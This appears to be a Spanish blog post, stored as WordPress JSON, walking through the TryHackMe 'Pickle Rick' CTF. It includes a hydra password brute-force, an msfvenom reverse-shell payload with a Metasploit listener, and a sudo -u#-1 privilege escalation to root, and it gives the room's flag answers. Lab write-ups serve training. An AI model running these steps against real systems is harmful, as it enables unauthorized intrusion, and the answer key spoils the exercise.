{"id":98,"date":"2023-09-05T17:19:14","date_gmt":"2023-09-05T20:19:14","guid":{"rendered":"https:\/\/mauriciobeltran.cl\/?p=98"},"modified":"2023-09-05T22:54:14","modified_gmt":"2023-09-06T01:54:14","slug":"tryhackme-pickle-rick-resuelto","status":"publish","type":"post","link":"https:\/\/mauriciobeltran.cl\/index.php\/2023\/09\/05\/tryhackme-pickle-rick-resuelto\/","title":{"rendered":"TryHackMe – Pickle Rick (resuelto)"},"content":{"rendered":"\n

Este CTF para Beginners nos pide encontrar 3 ingredientes de la poci\u00f3n para volver a la normalidad a Rick<\/p>\n\n\n\n

Rick user<\/h2>\n\n\n\n

Si inspeccionamos la pagina nos encontraremos con el usuario de rick comentado. Esta info nos es util para ataques por diccionario. Pero veamos que mas pillamos.<\/p>\n\n\n

\n&lt;!--\n    Note to self, remember username!\n    Username: R1ckRul3s\n-->\n\n<\/pre><\/div>\n\n\n
Escaneando la m\u00e1quina<\/h2>\n\n\n\n
La verdad es que si escaneamos no nos dice mucho, un puerto 22 y un 80.<\/p>\n\n\n\n
El puerto 22 tiene deshabilitado el login por contrase\u00f1a, la version no es explotable tampoco, as\u00ed que mientras no tengamos la llave, ni so\u00f1ar.<\/p>\n\n\n\n
Escaneando la pagina web<\/h2>\n\n\n\n
Vamos a usar nikto para listar posibles archivos de inter\u00e9s.<\/p>\n\n\n
\nnikto -host 10.10.229.151\n\n<\/pre><\/div>\n\n
\n- Nikto v2.1.5\n---------------------------------------------------------------------------\n+ Target IP:          10.10.229.151\n+ Target Hostname:    ip-10-10-229-151.eu-west-1.compute.internal\n+ Target Port:        80\n+ Start Time:         2023-09-05 00:36:09 (GMT1)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.18 (Ubuntu)\n+ Server leaks inodes via ETags, header found with file \/, fields: 0x426 0x5818ccf125686 \n+ The anti-clickjacking X-Frame-Options header is not present.\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).\n+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS \n+ Cookie PHPSESSID created without the httponly flag\n+ OSVDB-3233: \/icons\/README: Apache default file found.\n+ \/login.php: Admin login page\/section found.\n+ 6544 items checked: 0 error(s) and 7 item(s) reported on remote host\n+ End Time:           2023-09-05 00:36:17 (GMT1) (8 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested\n\n<\/pre><\/div>\n\n\n
Algunas cosas interesantes es que entontramos un login.php y un archivo robots.txt<\/p>\n\n\n\n
login.php nos lleva aun login, ya tenemos el username por lo que nos falta encontrar la contrase\u00f1a.<\/p>\n\n\n\n
Podemos dejar un ataque por diccionario mientras vemos otras opciones.<\/p>\n\n\n
\nhydra -l R1ckRul3s -P \/usr\/share\/wordlists\/rockyou.txt 10.10.229.151 http-post-form "\/login.php:username=^USER^&password=^PASS^&sub=Login:Invalid username or password." -V -F\n\n<\/pre><\/div>\n\n\n
En el robots.txt encontramos algo interesante, pero t\u00edpico de Rick.<\/p>\n\n\n
\nWubbalubbadubdub\n\n<\/pre><\/div>\n\n\n
Suena como a Rick, usemoslo como contrase\u00f1a.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Entramos :D.<\/p>\n\n\n\n
Tenemos un command panel que al parecer nos permite jugar, veamos que hay:<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Si listamos que hay, nos encontramos con un archivo llamado Sup3rS3cretPickl3Ingred.txt<\/p>\n\n\n\n
    \n
  1. What is the first ingredient that Rick needs? mr. meeseek hair<\/strong><\/li>\n<\/ol>\n\n\n\n
    Tambi\u00e9n hay otro archivo que dice clue.txt<\/p>\n\n\n\n
    Al revisarlo nos dice que revisemos el filesystem.<\/p>\n\n\n\n
    Hice varias cosas, pero al final di con lo siguiente mediante find:<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    \u00abcat\u00bb no funciona porque est\u00e1 deshabilitado, por lo que tendremos que \u00ableerlo\u00bb de alguna manera. Usemos base64 para aquello:<\/p>\n\n\n\n
    base64 \/home\/rick\/second\\ ingredients | base64 --decode<\/code><\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
      \n
    1. What is the second ingredient in Rick\u2019s potion?: 1 jerry tear<\/strong><\/li>\n<\/ol>\n\n\n\n
      Nos faltar\u00eda el \u00faltimo ingrediente y obvio, tenemos que escalar a root.<\/p>\n\n\n\n
      Por un lado generamos una shell reversa<\/p>\n\n\n
      \nmsfvenom -p linux\/x86\/shell\/reverse_tcp LHOST=10.8.153.49 LPORT=4444 -f elf > shell-x86.elf\n[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n[-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 123 bytes\nFinal size of elf file: 207 bytes\n<\/pre><\/div>\n\n\n
      descargamos linpeas.sh<\/p>\n\n\n
      \nwget https:\/\/github.com\/carlospolop\/PEASS-ng\/releases\/latest\/download\/linpeas.sh \n\n<\/pre><\/div>\n\n\n
      levantamos servidor http local<\/p>\n\n\n
      \npython -m http.server 80                                                        \nServing HTTP on 0.0.0.0 port 80 (http:\/\/0.0.0.0:80\/) ...\n\n<\/pre><\/div>\n\n\n
      En el prompt descargamos el shell creado anteriormente y le damos permisos de ejecucion<\/p>\n\n\n\n
      \"\"<\/figure>\n\n\n\n
      \"\"<\/figure>\n\n\n\n
      En el prompt descargamos linepeas y le damos permisos de ejecucion<\/p>\n\n\n\n
      \"\"<\/figure>\n\n\n\n
      \"\"<\/figure>\n\n\n\n
      En nuestra maquina atacante levantamos metasploit y generamos el listener<\/p>\n\n\n
      \nuse multi\/handler\n\n<\/pre><\/div>\n\n
      \nuse payload linux\/x86\/shell\/reverse_tcp\nuse 0\nset lhost 10.8.153.49\nexploit\n\n<\/pre><\/div>\n\n\n
      En el command panel ejecutamos el shell reverso<\/p>\n\n\n\n
      \"\"<\/figure>\n\n\n\n
      Eso levantara nuestra shell en metasploit<\/p>\n\n\n
      \nmsf6 payload(linux\/x86\/shell\/reverse_tcp) > \n[*] Started reverse TCP handler on 10.8.153.49:4444 \n[*] Sending stage (36 bytes) to 10.10.194.228\n[*] Command shell session 1 opened (10.8.153.49:4444 -> 10.10.194.228:55854) at 2023-09-05 15:50:54 -0400\n<\/pre><\/div>\n\n\n
      ya adentro, ejecutramos linepeas para que busque vulnerabilidades y nosotros a tomar cafecito.<\/p>\n\n\n
      \n\/tmp\/linepeas.sh\n<\/pre><\/div>\n\n\n
      Dentro de lo que nos avisa, es de un exploit que afecta a la version de sudo que afecta las versiones menores a 1.28<\/p>\n\n\n
      \n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Sudo version\n\u255a https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation#sudo-version                                                                                                                                                             \nSudo version 1.8.16 \n\n<\/pre><\/div>\n\n\n
      Exploiting<\/p>\n\n\n
      \nsudo -u#-1 \/bin\/bash\n\n<\/pre><\/div>\n\n
      \nwhoami\nroot\n\n<\/pre><\/div>\n\n
      \nls \/root\n3rd.txt\nsnap\n\n<\/pre><\/div>\n\n
      \ncat \/root\/3rd.txt\n3rd ingredients: fleeb juice\n\n<\/pre><\/div>\n\n\n
        \n
      1. What is the last and final ingredient?: fleeb juice<\/strong><\/em><\/li>\n<\/ol>\n\n\n\n
        Y con eso estamos <\/p>\n\n\n\n
        P.D.: Hice varias cosas manuales antes de ejecutar linpeas, pero es incre\u00edble el tiempo que te ahorra la dichosa herramienta. :D.<\/p>\n","protected":false},"excerpt":{"rendered":"
        Este CTF para Beginners nos pide encontrar 3 ingredientes de<\/p>\n","protected":false},"author":1,"featured_media":119,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,7],"tags":[12,9],"class_list":["post-98","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersec","category-ethical-hacking","tag-pickle-rick","tag-tryhackme"],"_links":{"self":[{"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/posts\/98","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/comments?post=98"}],"version-history":[{"count":13,"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/posts\/98\/revisions"}],"predecessor-version":[{"id":124,"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/posts\/98\/revisions\/124"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/media\/119"}],"wp:attachment":[{"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/media?parent=98"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/categories?post=98"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/tags?post=98"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}